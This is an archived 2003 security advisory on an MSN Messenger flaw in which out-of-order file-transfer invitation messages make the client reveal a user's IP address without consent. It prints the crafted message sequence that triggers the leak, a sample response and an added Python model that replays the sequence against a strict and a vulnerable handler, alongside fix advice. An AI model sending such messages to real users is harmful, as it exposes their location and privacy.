
msnbug.txt
Posted Nov 25, 2003
Authored by Hi_Tech_Assassin, Brice aka THR

A bug exists in MSN's Messenger client that allows a user's IP address to be exposed due to improper parsing of the Ip-Address field when parsing requests.

tags | exploit
SHA-256 | 11b8007718efec8768261dc195d3d80f9c2678aab4655d151fba650b133b883d

MSN Messenger bug

Release Date:
20/11/03

Discovery date:
Sometime around 2001 or 2000

Versions Affected:
------------------

MSN Messenger 1.0 -> MSN Messenger 6.0.0602
Windows Messenger all versions

Not Affected:
------------

MSN Messenger 6.1, Trillian, Gaim

Description:
-----------

A bug exists in Microsoft's MSN Messenger client.
MSN Messenger improperly parses the fields of
file transfer invitation requests, in particular
the request IP field. This makes it possible to
trick the MSN client into giving *away* the user's
IP address without him/her first accepting the
file transfer.

The bug is triggered when specially crafted MSG
requests are sent to the switchboard server and
then relayed on to the client. On receiving each
request from the switchboard, the client processes
the IP-Address field without first waiting for
userB to accept the file that is being sent. The
cause appears to be that the MSN client unsafely
relies on userB's client sending the sequences,
and the fields within them, in the expected order.
A malicious user could instead construct a program
that sends them out of order and requests userB's
IP address before userB has asked userA for its IP
address; userB's client will then wrongly hand out
the address. This bypasses the whole accept step
and lets an attacker invade the user's privacy by
disclosing such sensitive information.

Below is an example of the *expected* exchange of
data (this, however, can be exploited):

Example:

>>> MSG 4 N 277
MIME-Version: 1.0
Content-Type: text/x-msmsgsinvite; charset=UTF-8

Application-Name: File Transfer
Application-GUID: {5D3E02AB-6190-11d3-BBBB-00C04F795683}
Invitation-Command: INVITE
Invitation-Cookie: 33267
Application-File: readme.txt
Application-FileSize: 60904


<<< MSG example@passport.com Tim 179
MIME-Version: 1.0
Content-Type: text/x-msmsgsinvite; charset=UTF-8

Invitation-Command: ACCEPT
Invitation-Cookie: 33267
Launch-Application: FALSE
Request-Data: IP-Address:


>>> MSG 4 N 238
MIME-Version: 1.0
Content-Type: text/x-msmsgsinvite; charset=UTF-8

Invitation-Command: ACCEPT
Invitation-Cookie: 33267
IP-Address: 10.44.102.65
Port: 6891
AuthCookie: 93301
Launch-Application: FALSE
Request-Data: IP-Address:

However, to exploit the bug we would send the following:

"MSG 1 N 275\r\n"
"MIME-Version: 1.0\r\n"
"Content-Type: text/x-msmsgsinvite; charset=UTF-8\r\n"
"\r\n"
"Application-Name: File Transfer\r\n"
"Application-GUID: {5D3E02AB-6190-11d3-BBBB-00C04F795683}\r\n"
"Invitation-Command: INVITE\r\n"
"Invitation-Cookie: 1\r\n"
"Application-File: wanker.\xdd\xff\xcf\xee\xcd\x0a\x0fjpg\r\n"
"Application-FileSize: 10\r\n"
"MSG 2 N 191\r\n"
"MIME-Version: 1.0\r\n"
"Content-Type: text/x-msmsgsinvite; charset=UTF-8\r\n"
"\r\n"
"Invitation-Command: ACCEPT\r\n"
"Invitation-Cookie: 1\r\n"
"AuthCookie: 10\r\n"
"Launch-Application: FALSE\r\n"
"Request-Data: IP-Address:\r\n"
"MSG 3 N 143\r\n"
"MIME-Version: 1.0\r\n"
"Content-Type: text/x-msmsgsinvite; charset=UTF-8\r\n"
"\r\n"
"Invitation-Command: CANCEL\r\n"
"Invitation-Cookie: 1\r\n"
"Cancel-Code: TIMEOUT\r\n"

We should get a response something like the one below:

Invitation-Command: ACCEPT
Invitation-Cookie: 1
IP-Address: 81.131.24.31
Port: 6892
PortX: 11181
AuthCookie: 15784036
Launch-Application: FALSE
Request-Data: IP-Address:

Code will be made public sometime in the future to
demonstrate the bug.

Severity:
~~~~~~~~~

This bug has been actively exploited in the wild.
Due to the transition to the new MSNP protocol,
however, many of the variants derived from
sniffing the original no longer work, but it
is only a matter of time before a new version is
made widely available.

Possible fix/workaround:
~~~~~~~~~~~~~~~~~~~~~~~

The problem may be fixed to some extent by using the
Messenger disallow list to block any uninvited users
who are not on your allow list. This way you cannot
be exploited unless you specifically trust the user
and he is on your allow list.

A mechanism must be added to the MSN Messenger
client that first checks that userB has accepted
the file userA is trying to send before processing
the Request-Data: IP-Address: field. It seems
pretty sad that MS cannot get this right, even
later rather than sooner, especially when all
third-party clients seem to have such a mechanism
in place that has worked effectively.
I have tested this technique extensively with others
such as Trillian, and these seem to be safe.

Upgrade to msn messenger 6.1
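As an added illustration of the check described in the Description and Possible fix sections (example code written for this page, not Microsoft's client or the advisory's own code): a minimal handler for text/x-msmsgsinvite payloads that answers Request-Data: IP-Address: only for an Invitation-Cookie it issued itself, so the peer-supplied INVITE then ACCEPT sequence discloses nothing. The local IP, port, helper names and the message bodies are constructed values.

```python
# Added example, not code from the advisory or from Microsoft's client: a
# minimal text/x-msmsgsinvite handler with the check the advisory asks for.
# It answers "Request-Data: IP-Address:" only for an Invitation-Cookie it
# issued itself (an outgoing INVITE the peer is accepting). Constructed data.

def parse_invite(payload):
    _, _, body = payload.partition("\r\n\r\n")  # skip MIME-Version/Content-Type
    fields = {}
    for line in body.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep and name.strip():
            fields[name.strip()] = value.strip()
    return fields

class InviteClient:
    def __init__(self, local_ip, strict=True):
        self.local_ip = local_ip
        self.strict = strict      # strict=False reproduces the advisory's flaw
        self.outgoing = set()     # cookies of INVITEs this client sent

    def send_invite(self, cookie):  # local user offered a file under cookie
        self.outgoing.add(cookie)

    def handle(self, payload):
        f = parse_invite(payload)
        cookie, cmd = f.get("Invitation-Cookie"), f.get("Invitation-Command")
        if cmd == "CANCEL":
            self.outgoing.discard(cookie)
        elif cmd == "ACCEPT" and "IP-Address" in f.get("Request-Data", ""):
            # The missing check: answer only when the peer is accepting a
            # transfer *we* offered under this cookie, not one it sent us.
            if self.strict and cookie not in self.outgoing:
                return None
            return {"Invitation-Command": "ACCEPT", "Invitation-Cookie": cookie,
                    "IP-Address": self.local_ip, "Port": "6891"}
        return None

MIME = "MIME-Version: 1.0\r\nContent-Type: text/x-msmsgsinvite; charset=UTF-8\r\n\r\n"
# Constructed from the advisory's exploit sequence: peer sends INVITE, then
# ACCEPT requesting our address, under a cookie we never issued.
ATTACK = [MIME + "Invitation-Command: INVITE\r\nInvitation-Cookie: 1\r\n"
          "Application-File: readme.txt\r\nApplication-FileSize: 10\r\n",
          MIME + "Invitation-Command: ACCEPT\r\nInvitation-Cookie: 1\r\n"
          "AuthCookie: 10\r\nRequest-Data: IP-Address:\r\n"]

def leaked_ips(strict):  # replay ATTACK; return any IPs the client hands out
    c = InviteClient("10.44.102.65", strict)
    return [r["IP-Address"] for r in map(c.handle, ATTACK) if r]
```

With strict=True the replay yields no address; with strict=False it models the vulnerable client and hands the address out on the bare ACCEPT.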

Credit:
Discovery: Brice aka THR

Feedback
Please send suggestions or comments to:

hi_tech_assassin@hackermail.com